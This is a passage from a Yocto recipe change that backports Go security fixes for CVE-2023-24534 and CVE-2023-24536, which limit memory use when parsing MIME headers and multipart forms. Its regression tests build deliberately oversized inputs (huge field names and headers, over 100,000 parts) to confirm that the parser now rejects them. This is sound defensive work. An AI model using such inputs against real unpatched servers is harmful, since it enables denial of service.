173+ if maxMemoryBytes < 0 {
174 return nil, ErrMessageTooLarge
175 }
176 form.Value[name] = append(form.Value[name], b.String())
177@@ -81,35 +128,45 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
178 }
179
180 // file, store in memory or on disk
181+ maxMemoryBytes -= mimeHeaderSize(p.Header)
182+ if maxMemoryBytes < 0 {
183+ return nil, ErrMessageTooLarge
184+ }
185 fh := &FileHeader{
186 Filename: filename,
187 Header: p.Header,
188 }
189- n, err := io.CopyN(&b, p, maxMemory+1)
190+ n, err := io.CopyN(&b, p, maxFileMemoryBytes+1)
191 if err != nil && err != io.EOF {
192 return nil, err
193 }
194- if n > maxMemory {
195- // too big, write to disk and flush buffer
196- file, err := ioutil.TempFile("", "multipart-")
197- if err != nil {
198- return nil, err
199+ if n > maxFileMemoryBytes {
200+ if file == nil {
201+ file, err = ioutil.TempFile(r.tempDir, "multipart-")
202+ if err != nil {
203+ return nil, err
204+ }
205 }
206+ numDiskFiles++
207 size, err := io.Copy(file, io.MultiReader(&b, p))
208- if cerr := file.Close(); err == nil {
209- err = cerr
210- }
211 if err != nil {
212- os.Remove(file.Name())
213 return nil, err
214 }
215 fh.tmpfile = file.Name()
216 fh.Size = size
217+ fh.tmpoff = fileOff
218+ fileOff += size
219+ if !combineFiles {
220+ if err := file.Close(); err != nil {
221+ return nil, err
222+ }
223+ file = nil
224+ }
225 } else {
226 fh.content = b.Bytes()
227 fh.Size = int64(len(fh.content))
228- maxMemory -= n
229- maxValueBytes -= n
230+ maxFileMemoryBytes -= n
231+ maxMemoryBytes -= n
232 }
233 form.File[name] = append(form.File[name], fh)
234 }
235@@ -117,6 +174,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
236 return form, nil
237 }
238
239+func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
240+ for k, vs := range h {
241+ size += int64(len(k))
242+ size += 100 // map entry overhead
243+ for _, v := range vs {
244+ size += int64(len(v))
245+ }
246+ }
247+ return size
248+}
249+
250 // Form is a parsed multipart form.
251 // Its File parts are stored either in memory or on disk,
252 // and are accessible via the *FileHeader's Open method.
253@@ -134,7 +202,7 @@ func (f *Form) RemoveAll() error {
254 for _, fh := range fhs {
255 if fh.tmpfile != "" {
256 e := os.Remove(fh.tmpfile)
257- if e != nil && err == nil {
258+ if e != nil && !errors.Is(e, os.ErrNotExist) && err == nil {
259 err = e
260 }
261 }
262@@ -149,15 +217,25 @@ type FileHeader struct {
263 Header textproto.MIMEHeader
264 Size int64
265
266- content []byte
267- tmpfile string
268+ content []byte
269+ tmpfile string
270+ tmpoff int64
271+ tmpshared bool
272 }
273
274 // Open opens and returns the FileHeader's associated File.
275 func (fh *FileHeader) Open() (File, error) {
276 if b := fh.content; b != nil {
277 r := io.NewSectionReader(bytes.NewReader(b), 0, int64(len(b)))
278- return sectionReadCloser{r}, nil
279+ return sectionReadCloser{r, nil}, nil
280+ }
281+ if fh.tmpshared {
282+ f, err := os.Open(fh.tmpfile)
283+ if err != nil {
284+ return nil, err
285+ }
286+ r := io.NewSectionReader(f, fh.tmpoff, fh.Size)
287+ return sectionReadCloser{r, f}, nil
288 }
289 return os.Open(fh.tmpfile)
290 }
291@@ -176,8 +254,12 @@ type File interface {
292
293 type sectionReadCloser struct {
294 *io.SectionReader
295+ io.Closer
296 }
297
298 func (rc sectionReadCloser) Close() error {
299+ if rc.Closer != nil {
300+ return rc.Closer.Close()
301+ }
302 return nil
303 }
304diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
305index e3a3a3e..5cded71 100644
306--- a/src/mime/multipart/formdata_test.go
307+++ b/src/mime/multipart/formdata_test.go
308@@ -6,8 +6,10 @@ package multipart
309
310 import (
311 "bytes"
312+ "fmt"
313 "io"
314 "math"
315+ "net/textproto"
316 "os"
317 "strings"
318 "testing"
319@@ -208,8 +210,8 @@ Content-Disposition: form-data; name="largetext"
320 maxMemory int64
321 err error
322 }{
323- {"smaller", 50, nil},
324- {"exact-fit", 25, nil},
325+ {"smaller", 50 + int64(len("largetext")) + 100, nil},
326+ {"exact-fit", 25 + int64(len("largetext")) + 100, nil},
327 {"too-large", 0, ErrMessageTooLarge},
328 }
329 for _, tc := range testCases {
330@@ -224,7 +226,7 @@ Content-Disposition: form-data; name="largetext"
331 defer f.RemoveAll()
332 }
333 if tc.err != err {
334- t.Fatalf("ReadForm error - got: %v; expected: %v", tc.err, err)
335+ t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
336 }
337 if err == nil {
338 if g := f.Value["largetext"][0]; g != largeTextValue {
339@@ -234,3 +236,135 @@ Content-Disposition: form-data; name="largetext"
340 })
341 }
342 }
343+
344+// TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
345+// MIME headers, and map entry overhead while limiting the memory consumption of parsed forms.
346+func TestReadForm_MetadataTooLarge(t *testing.T) {
347+ for _, test := range []struct {
348+ name string
349+ f func(*Writer)
350+ }{{
351+ name: "large name",
352+ f: func(fw *Writer) {
353+ name := strings.Repeat("a", 10<<20)
354+ w, _ := fw.CreateFormField(name)
355+ w.Write([]byte("value"))
356+ },
357+ }, {
358+ name: "large MIME header",
359+ f: func(fw *Writer) {
360+ h := make(textproto.MIMEHeader)
361+ h.Set("Content-Disposition", `form-data; name="a"`)
362+ h.Set("X-Foo", strings.Repeat("a", 10<<20))
363+ w, _ := fw.CreatePart(h)
364+ w.Write([]byte("value"))
365+ },
366+ }, {
367+ name: "many parts",
368+ f: func(fw *Writer) {
369+ for i := 0; i < 110000; i++ {
370+ w, _ := fw.CreateFormField("f")
371+ w.Write([]byte("v"))
372+ }
373+ },
374+ }} {
375+ t.Run(test.name, func(t *testing.T) {
376+ var buf bytes.Buffer
377+ fw := NewWriter(&buf)
378+ test.f(fw)
379+ if err := fw.Close(); err != nil {
380+ t.Fatal(err)
381+ }
382+ fr := NewReader(&buf, fw.Boundary())
383+ _, err := fr.ReadForm(0)
384+ if err != ErrMessageTooLarge {
385+ t.Errorf("fr.ReadForm() = %v, want ErrMessageTooLarge", err)
386+ }
387+ })
388+ }
389+}
390+
391+// TestReadForm_ManyFiles_Combined tests that a multipart form containing many files only
392+// results in a single on-disk file.
393+func TestReadForm_ManyFiles_Combined(t *testing.T) {
394+ const distinct = false
395+ testReadFormManyFiles(t, distinct)
396+}
397+
398+// TestReadForm_ManyFiles_Distinct tests that setting GODEBUG=multipartfiles=distinct
399+// results in every file in a multipart form being placed in a distinct on-disk file.
400+func TestReadForm_ManyFiles_Distinct(t *testing.T) {
401+ t.Setenv("GODEBUG", "multipartfiles=distinct")
402+ const distinct = true
403+ testReadFormManyFiles(t, distinct)
404+}
405+
406+func testReadFormManyFiles(t *testing.T, distinct bool) {
407+ var buf bytes.Buffer
408+ fw := NewWriter(&buf)
409+ const numFiles = 10
410+ for i := 0; i < numFiles; i++ {
411+ name := fmt.Sprint(i)
412+ w, err := fw.CreateFormFile(name, name)
413+ if err != nil {
414+ t.Fatal(err)
415+ }
416+ w.Write([]byte(name))
417+ }
418+ if err := fw.Close(); err != nil {
419+ t.Fatal(err)
420+ }
421+ fr := NewReader(&buf, fw.Boundary())
422+ fr.tempDir = t.TempDir()
423+ form, err := fr.ReadForm(0)
424+ if err != nil {
425+ t.Fatal(err)
426+ }
427+ for i := 0; i < numFiles; i++ {
428+ name := fmt.Sprint(i)
429+ if got := len(form.File[name]); got != 1 {
430+ t.Fatalf("form.File[%q] has %v entries, want 1", name, got)
431+ }
432+ fh := form.File[name][0]
433+ file, err := fh.Open()
434+ if err != nil {
435+ t.Fatalf("form.File[%q].Open() = %v", name, err)
436+ }
437+ if distinct {
438+ if _, ok := file.(*os.File); !ok {
439+ t.Fatalf("form.File[%q].Open: %T, want *os.File", name, file)
440+ }
441+ }
442+ got, err := io.ReadAll(file)
443+ file.Close()
444+ if string(got) != name || err != nil {
445+ t.Fatalf("read form.File[%q]: %q, %v; want %q, nil", name, string(got), err, name)
446+ }
447+ }
448+ dir, err := os.Open(fr.tempDir)
449+ if err != nil {
450+ t.Fatal(err)
451+ }
452+ defer dir.Close()
453+ names, err := dir.Readdirnames(0)
454+ if err != nil {
455+ t.Fatal(err)
456+ }
457+ wantNames := 1
458+ if distinct {
459+ wantNames = numFiles
460+ }
461+ if len(names) != wantNames {
462+ t.Fatalf("temp dir contains %v files; want 1", len(names))
463+ }
464+ if err := form.RemoveAll(); err != nil {
465+ t.Fatalf("form.RemoveAll() = %v", err)
466+ }
467+ names, err = dir.Readdirnames(0)
468+ if err != nil {
469+ t.Fatal(err)
470+ }
471+ if len(names) != 0 {
472+ t.Fatalf("temp dir contains %v files; want 0", len(names))
473+ }
474+}
475diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
476index 1750300..958cef8 100644
477--- a/src/mime/multipart/multipart.go
478+++ b/src/mime/multipart/multipart.go
479@@ -121,12 +121,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
480 return n, r.err
481 }
482
483-func newPart(mr *Reader, rawPart bool) (*Part, error) {
484+func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
485 bp := &Part{
486 Header: make(map[string][]string),
487 mr: mr,
488 }
489- if err := bp.populateHeaders(); err != nil {
490+ if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
491 return nil, err
492 }
493 bp.r = partReader{bp}
494@@ -142,12 +142,16 @@ func newPart(mr *Reader, rawPart bool) (*Part, error) {
495 return bp, nil
496 }
497
498-func (bp *Part) populateHeaders() error {
499+func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
500 r := textproto.NewReader(bp.mr.bufReader)
501- header, err := r.ReadMIMEHeader()
502+ header, err := readMIMEHeader(r, maxMIMEHeaderSize)
503 if err == nil {
504 bp.Header = header
505 }
506+ // TODO: Add a distinguishable error to net/textproto.
507+ if err != nil && err.Error() == "message too large" {
508+ err = ErrMessageTooLarge
509+ }
510 return err
511 }
512
513@@ -287,6 +291,7 @@ func (p *Part) Close() error {
514 // isn't supported.
515 type Reader struct {
516 bufReader *bufio.Reader
517+ tempDir string // used in tests
518
519 currentPart *Part
520 partsRead int
521@@ -297,6 +302,10 @@ type Reader struct {
522 dashBoundary []byte // "--boundary"
523 }
524
525+// maxMIMEHeaderSize is the maximum size of a MIME header we will parse,
526+// including header keys, values, and map overhead.
527+const maxMIMEHeaderSize = 10 << 20
528+
529 // NextPart returns the next part in the multipart or an error.
530 // When there are no more parts, the error io.EOF is returned.
531 //
532@@ -304,7 +313,7 @@ type Reader struct {
533 // has a value of "quoted-printable", that header is instead
534 // hidden and the body is transparently decoded during Read calls.
535 func (r *Reader) NextPart() (*Part, error) {
536- return r.nextPart(false)
537+ return r.nextPart(false, maxMIMEHeaderSize)
538 }
539
540 // NextRawPart returns the next part in the multipart or an error.
541@@ -313,10 +322,10 @@ func (r *Reader) NextPart() (*Part, error) {
542 // Unlike NextPart, it does not have special handling for
543 // "Content-Transfer-Encoding: quoted-printable".
544 func (r *Reader) NextRawPart() (*Part, error) {
545- return r.nextPart(true)
546+ return r.nextPart(true, maxMIMEHeaderSize)
547 }
548
549-func (r *Reader) nextPart(rawPart bool) (*Part, error) {
550+func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
551 if r.currentPart != nil {
552 r.currentPart.Close()
553 }
554@@ -341,7 +350,7 @@ func (r *Reader) nextPart(rawPart bool) (*Part, error) {
555
556 if r.isBoundaryDelimiterLine(line) {
557 r.partsRead++
558- bp, err := newPart(r, rawPart)
559+ bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
560 if err != nil {
561 return nil, err
562 }
563diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
564new file mode 100644
565index 0000000..6836928
566--- /dev/null
567+++ b/src/mime/multipart/readmimeheader.go
568@@ -0,0 +1,14 @@
569+// Copyright 2023 The Go Authors. All rights reserved.
570+// Use of this source code is governed by a BSD-style
571+// license that can be found in the LICENSE file.
572+package multipart
573+
574+import (
575+ "net/textproto"
576+ _ "unsafe" // for go:linkname
577+)
578+
579+// readMIMEHeader is defined in package net/textproto.
580+//
581+//go:linkname readMIMEHeader net/textproto.readMIMEHeader
582+func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
583diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
584index 94133ee..170d3f5 100644
585--- a/src/net/http/request_test.go
586+++ b/src/net/http/request_test.go
587@@ -962,7 +962,7 @@ func testMissingFile(t *testing.T, req *Request) {
588 t.Errorf("FormFile file = %v, want nil", f)
589 }
590 if fh != nil {
591- t.Errorf("FormFile file header = %q, want nil", fh)
592+ t.Errorf("FormFile file header = %v, want nil", fh)
593 }
594 if err != ErrMissingFile {
595 t.Errorf("FormFile err = %q, want ErrMissingFile", err)
596diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
597index f63f5ec..96553fb 100644
598--- a/src/net/textproto/reader.go
599+++ b/src/net/textproto/reader.go
600@@ -7,9 +7,11 @@ package textproto
601 import (
602 "bufio"
603 "bytes"
604+ "errors"
605 "fmt"
606 "io"
607 "io/ioutil"
608+ "math"
609 "strconv"
610 "strings"
611 "sync"
612@@ -482,6 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
613 // }
614 //
615 func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
616+ return readMIMEHeader(r, math.MaxInt64)
617+}
618+
619+// readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
620+// It is called by the mime/multipart package.
621+func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
622 // Avoid lots of small slice allocations later by allocating one
623 // large one ahead of time which we'll cut up into smaller
624 // slices. If this isn't big enough later, we allocate small ones.
625@@ -525,6 +533,15 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
626 continue
627 }
628
629+ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
630+ //
631+ // value is computed as
632+ // value := string(bytes.TrimLeft(v, " \t"))
633+ //
634+ // in the original patch from 1.19. This relies on
635+ // 'v' which does not exist in 1.14. We leave the
636+ // 1.14 method unchanged.
637+
638 // Skip initial spaces in value.
639 i++ // skip colon
640 for i < len(kv) && (kv[i] == ' ' || kv[i] == '\t') {
641@@ -533,6 +550,16 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
642 value := string(kv[i:])
643
644 vv := m[key]
645+ if vv == nil {
646+ lim -= int64(len(key))
647+ lim -= 100 // map entry overhead
648+ }
649+ lim -= int64(len(value))
650+ if lim < 0 {
651+ // TODO: This should be a distinguishable error (ErrMessageTooLarge)
652+ // to allow mime/multipart to detect it.
653+ return m, errors.New("message too large")
654+ }
655 if vv == nil && len(strs) > 0 {
656 // More than likely this will be a single-element key.
657 // Most headers aren't multi-valued.
658--
6592.25.1
660
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
new file mode 100644
index 0000000000..d50db04bed
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24534.patch
@@ -0,0 +1,200 @@
1From d6759e7a059f4208f07aa781402841d7ddaaef96 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Fri, 10 Mar 2023 14:21:05 -0800
4Subject: [PATCH] [release-branch.go1.19] net/textproto: avoid overpredicting
5 the number of MIME header keys
6
7Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802452
8Run-TryBot: Damien Neil <dneil@google.com>
9Reviewed-by: Roland Shoemaker <bracewell@google.com>
10Reviewed-by: Julie Qiu <julieqiu@google.com>
11(cherry picked from commit f739f080a72fd5b06d35c8e244165159645e2ed6)
12Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802393
13Reviewed-by: Damien Neil <dneil@google.com>
14Run-TryBot: Roland Shoemaker <bracewell@google.com>
15Change-Id: I675451438d619a9130360c56daf529559004903f
16Reviewed-on: https://go-review.googlesource.com/c/go/+/481982
17Run-TryBot: Michael Knyszek <mknyszek@google.com>
18TryBot-Result: Gopher Robot <gobot@golang.org>
19Reviewed-by: Matthew Dempsky <mdempsky@google.com>
20Auto-Submit: Michael Knyszek <mknyszek@google.com>
21
22Upstream-Status: Backport [https://github.com/golang/go/commit/d6759e7a059f4208f07aa781402841d7ddaaef96]
23CVE: CVE-2023-24534
24Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
25---
26 src/bytes/bytes.go | 13 +++++++
27 src/net/textproto/reader.go | 31 +++++++++++------
28 src/net/textproto/reader_test.go | 59 ++++++++++++++++++++++++++++++++
29 3 files changed, 92 insertions(+), 11 deletions(-)
30
31diff --git a/src/bytes/bytes.go b/src/bytes/bytes.go
32index e872cc2..1f0d760 100644
33--- a/src/bytes/bytes.go
34+++ b/src/bytes/bytes.go
35@@ -1078,6 +1078,19 @@ func Index(s, sep []byte) int {
36 return -1
37 }
38
39+// Cut slices s around the first instance of sep,
40+// returning the text before and after sep.
41+// The found result reports whether sep appears in s.
42+// If sep does not appear in s, cut returns s, nil, false.
43+//
44+// Cut returns slices of the original slice s, not copies.
45+func Cut(s, sep []byte) (before, after []byte, found bool) {
46+ if i := Index(s, sep); i >= 0 {
47+ return s[:i], s[i+len(sep):], true
48+ }
49+ return s, nil, false
50+}
51+
52 func indexRabinKarp(s, sep []byte) int {
53 // Rabin-Karp search
54 hashsep, pow := hashStr(sep)
55diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
56index a505da9..8d547fe 100644
57--- a/src/net/textproto/reader.go
58+++ b/src/net/textproto/reader.go
59@@ -486,8 +487,11 @@ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
60 // large one ahead of time which we'll cut up into smaller
61 // slices. If this isn't big enough later, we allocate small ones.
62 var strs []string
63- hint := r.upcomingHeaderNewlines()
64+ hint := r.upcomingHeaderKeys()
65 if hint > 0 {
66+ if hint > 1000 {
67+ hint = 1000 // set a cap to avoid overallocation
68+ }
69 strs = make([]string, hint)
70 }
71
72@@ -562,9 +566,11 @@ func mustHaveFieldNameColon(line []byte) error {
73 return nil
74 }
75
76-// upcomingHeaderNewlines returns an approximation of the number of newlines
77+var nl = []byte("\n")
78+
79+// upcomingHeaderKeys returns an approximation of the number of keys
80 // that will be in this header. If it gets confused, it returns 0.
81-func (r *Reader) upcomingHeaderNewlines() (n int) {
82+func (r *Reader) upcomingHeaderKeys() (n int) {
83 // Try to determine the 'hint' size.
84 r.R.Peek(1) // force a buffer load if empty
85 s := r.R.Buffered()
86@@ -572,17 +578,20 @@ func (r *Reader) upcomingHeaderNewlines() (n int) {
87 return
88 }
89 peek, _ := r.R.Peek(s)
90- for len(peek) > 0 {
91- i := bytes.IndexByte(peek, '\n')
92- if i < 3 {
93- // Not present (-1) or found within the next few bytes,
94- // implying we're at the end ("\r\n\r\n" or "\n\n")
95- return
96+ for len(peek) > 0 && n < 1000 {
97+ var line []byte
98+ line, peek, _ = bytes.Cut(peek, nl)
99+ if len(line) == 0 || (len(line) == 1 && line[0] == '\r') {
100+ // Blank line separating headers from the body.
101+ break
102+ }
103+ if line[0] == ' ' || line[0] == '\t' {
104+ // Folded continuation of the previous line.
105+ continue
106 }
107 n++
108- peek = peek[i+1:]
109 }
110- return
111+ return n
112 }
113
114 // CanonicalMIMEHeaderKey returns the canonical format of the
115diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
116index 3124d43..3ae0de1 100644
117--- a/src/net/textproto/reader_test.go
118+++ b/src/net/textproto/reader_test.go
119@@ -9,6 +9,7 @@ import (
120 "bytes"
121 "io"
122 "reflect"
123+ "runtime"
124 "strings"
125 "testing"
126 )
127@@ -127,6 +128,42 @@ func TestReadMIMEHeaderSingle(t *testing.T) {
128 }
129 }
130
131+// TestReaderUpcomingHeaderKeys is testing an internal function, but it's very
132+// difficult to test well via the external API.
133+func TestReaderUpcomingHeaderKeys(t *testing.T) {
134+ for _, test := range []struct {
135+ input string
136+ want int
137+ }{{
138+ input: "",
139+ want: 0,
140+ }, {
141+ input: "A: v",
142+ want: 1,
143+ }, {
144+ input: "A: v\r\nB: v\r\n",
145+ want: 2,
146+ }, {
147+ input: "A: v\nB: v\n",
148+ want: 2,
149+ }, {
150+ input: "A: v\r\n continued\r\n still continued\r\nB: v\r\n\r\n",
151+ want: 2,
152+ }, {
153+ input: "A: v\r\n\r\nB: v\r\nC: v\r\n",
154+ want: 1,
155+ }, {
156+ input: "A: v" + strings.Repeat("\n", 1000),
157+ want: 1,
158+ }} {
159+ r := reader(test.input)
160+ got := r.upcomingHeaderKeys()
161+ if test.want != got {
162+ t.Fatalf("upcomingHeaderKeys(%q): %v; want %v", test.input, got, test.want)
163+ }
164+ }
165+}
166+
167 func TestReadMIMEHeaderNoKey(t *testing.T) {
168 r := reader(": bar\ntest-1: 1\n\n")
169 m, err := r.ReadMIMEHeader()
170@@ -223,6 +260,28 @@ func TestReadMIMEHeaderTrimContinued(t *testing.T) {
171 }
172 }
173
174+// Test that reading a header doesn't overallocate. Issue 58975.
175+func TestReadMIMEHeaderAllocations(t *testing.T) {
176+ var totalAlloc uint64
177+ const count = 200
178+ for i := 0; i < count; i++ {
179+ r := reader("A: b\r\n\r\n" + strings.Repeat("\n", 4096))
180+ var m1, m2 runtime.MemStats
181+ runtime.ReadMemStats(&m1)
182+ _, err := r.ReadMIMEHeader()
183+ if err != nil {
184+ t.Fatalf("ReadMIMEHeader: %v", err)
185+ }
186+ runtime.ReadMemStats(&m2)
187+ totalAlloc += m2.TotalAlloc - m1.TotalAlloc
188+ }
189+ // 32k is large and we actually allocate substantially less,
190+ // but prior to the fix for #58975 we allocated ~400k in this case.
191+ if got, want := totalAlloc/count, uint64(32768); got > want {
192+ t.Fatalf("ReadMIMEHeader allocated %v bytes, want < %v", got, want)
193+ }
194+}
195+
196 type readResponseTest struct {
197 in string
198 inCode int
199--
2002.25.1
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
new file mode 100644
index 0000000000..39e1304fbd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_1.patch
@@ -0,0 +1,134 @@
1From ef41a4e2face45e580c5836eaebd51629fc23f15 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Thu, 16 Mar 2023 14:18:04 -0700
4Subject: [PATCH] [release-branch.go1.19] mime/multipart: avoid excessive copy
5 buffer allocations in ReadForm
6
7When copying form data to disk with io.Copy,
8allocate only one copy buffer and reuse it rather than
9creating two buffers per file (one from io.multiReader.WriteTo,
10and a second one from os.File.ReadFrom).
11
12Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
13
14For CVE-2023-24536
15For #59153
16For #59269
17
18Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802453
19Run-TryBot: Damien Neil <dneil@google.com>
20Reviewed-by: Julie Qiu <julieqiu@google.com>
21Reviewed-by: Roland Shoemaker <bracewell@google.com>
22Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802395
23Run-TryBot: Roland Shoemaker <bracewell@google.com>
24Reviewed-by: Damien Neil <dneil@google.com>
25Change-Id: Ie405470c92abffed3356913b37d813e982c96c8b
26Reviewed-on: https://go-review.googlesource.com/c/go/+/481983
27Run-TryBot: Michael Knyszek <mknyszek@google.com>
28TryBot-Result: Gopher Robot <gobot@golang.org>
29Auto-Submit: Michael Knyszek <mknyszek@google.com>
30Reviewed-by: Matthew Dempsky <mdempsky@google.com>
31
32Upstream-Status: Backport [https://github.com/golang/go/commit/ef41a4e2face45e580c5836eaebd51629fc23f15]
33CVE: CVE-2023-24536
34Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
35---
36 src/mime/multipart/formdata.go | 15 +++++++--
37 src/mime/multipart/formdata_test.go | 49 +++++++++++++++++++++++++++++
38 2 files changed, 61 insertions(+), 3 deletions(-)
39
40diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
41index a7d4ca97f0484..975dcb6b26db4 100644
42--- a/src/mime/multipart/formdata.go
43+++ b/src/mime/multipart/formdata.go
44@@ -84,6 +84,7 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
45 maxMemoryBytes = math.MaxInt64
46 }
47 }
48+ var copyBuf []byte
49 for {
50 p, err := r.nextPart(false, maxMemoryBytes)
51 if err == io.EOF {
52@@ -147,14 +148,22 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
53 }
54 }
55 numDiskFiles++
56- size, err := io.Copy(file, io.MultiReader(&b, p))
57+ if _, err := file.Write(b.Bytes()); err != nil {
58+ return nil, err
59+ }
60+ if copyBuf == nil {
61+ copyBuf = make([]byte, 32*1024) // same buffer size as io.Copy uses
62+ }
63+ // os.File.ReadFrom will allocate its own copy buffer if we let io.Copy use it.
64+ type writerOnly struct{ io.Writer }
65+ remainingSize, err := io.CopyBuffer(writerOnly{file}, p, copyBuf)
66 if err != nil {
67 return nil, err
68 }
69 fh.tmpfile = file.Name()
70- fh.Size = size
71+ fh.Size = int64(b.Len()) + remainingSize
72 fh.tmpoff = fileOff
73- fileOff += size
74+ fileOff += fh.Size
75 if !combineFiles {
76 if err := file.Close(); err != nil {
77 return nil, err
78diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
79index 5cded7170c6b8..f5b56083b2377 100644
80--- a/src/mime/multipart/formdata_test.go
81+++ b/src/mime/multipart/formdata_test.go
82@@ -368,3 +368,52 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
83 t.Fatalf("temp dir contains %v files; want 0", len(names))
84 }
85 }
86+
87+func BenchmarkReadForm(b *testing.B) {
88+ for _, test := range []struct {
89+ name string
90+ form func(fw *Writer, count int)
91+ }{{
92+ name: "fields",
93+ form: func(fw *Writer, count int) {
94+ for i := 0; i < count; i++ {
95+ w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
96+ fmt.Fprintf(w, "value %v", i)
97+ }
98+ },
99+ }, {
100+ name: "files",
101+ form: func(fw *Writer, count int) {
102+ for i := 0; i < count; i++ {
103+ w, _ := fw.CreateFormFile(fmt.Sprintf("field%v", i), fmt.Sprintf("file%v", i))
104+ fmt.Fprintf(w, "value %v", i)
105+ }
106+ },
107+ }} {
108+ b.Run(test.name, func(b *testing.B) {
109+ for _, maxMemory := range []int64{
110+ 0,
111+ 1 << 20,
112+ } {
113+ var buf bytes.Buffer
114+ fw := NewWriter(&buf)
115+ test.form(fw, 10)
116+ if err := fw.Close(); err != nil {
117+ b.Fatal(err)
118+ }
119+ b.Run(fmt.Sprintf("maxMemory=%v", maxMemory), func(b *testing.B) {
120+ b.ReportAllocs()
121+ for i := 0; i < b.N; i++ {
122+ fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
123+ form, err := fr.ReadForm(maxMemory)
124+ if err != nil {
125+ b.Fatal(err)
126+ }
127+ form.RemoveAll()
128+ }
129+
130+ })
131+ }
132+ })
133+ }
134+}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
new file mode 100644
index 0000000000..9ba5114c82
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24536_2.patch
@@ -0,0 +1,184 @@
1From 7a359a651c7ebdb29e0a1c03102fce793e9f58f0 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Thu, 16 Mar 2023 16:56:12 -0700
4Subject: [PATCH] [release-branch.go1.19] net/textproto, mime/multipart:
5 improve accounting of non-file data
6
7For requests containing large numbers of small parts,
8memory consumption of a parsed form could be about 250%
9over the estimated size.
10
11When considering the size of parsed forms, account for the size of
12FileHeader structs and increase the estimate of memory consumed by
13map entries.
14
15Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
16
17For CVE-2023-24536
18For #59153
19For #59269
20
21Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802454
22Run-TryBot: Damien Neil <dneil@google.com>
23Reviewed-by: Roland Shoemaker <bracewell@google.com>
24Reviewed-by: Julie Qiu <julieqiu@google.com>
25Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802396
26Run-TryBot: Roland Shoemaker <bracewell@google.com>
27Reviewed-by: Damien Neil <dneil@google.com>
28Change-Id: I31bc50e9346b4eee6fbe51a18c3c57230cc066db
29Reviewed-on: https://go-review.googlesource.com/c/go/+/481984
30Reviewed-by: Matthew Dempsky <mdempsky@google.com>
31Auto-Submit: Michael Knyszek <mknyszek@google.com>
32TryBot-Result: Gopher Robot <gobot@golang.org>
33Run-TryBot: Michael Knyszek <mknyszek@google.com>
34
35Upstream-Status: Backport [https://github.com/golang/go/commit/7a359a651c7ebdb29e0a1c03102fce793e9f58f0]
36CVE: CVE-2023-24536
37Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
38---
39 src/mime/multipart/formdata.go | 9 +++--
40 src/mime/multipart/formdata_test.go | 55 ++++++++++++-----------------
41 src/net/textproto/reader.go | 8 ++++-
42 3 files changed, 37 insertions(+), 35 deletions(-)
43
44diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
45index 975dcb6b26db4..3f6ff697ca608 100644
46--- a/src/mime/multipart/formdata.go
47+++ b/src/mime/multipart/formdata.go
48@@ -103,8 +103,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
49 // Multiple values for the same key (one map entry, longer slice) are cheaper
50 // than the same number of values for different keys (many map entries), but
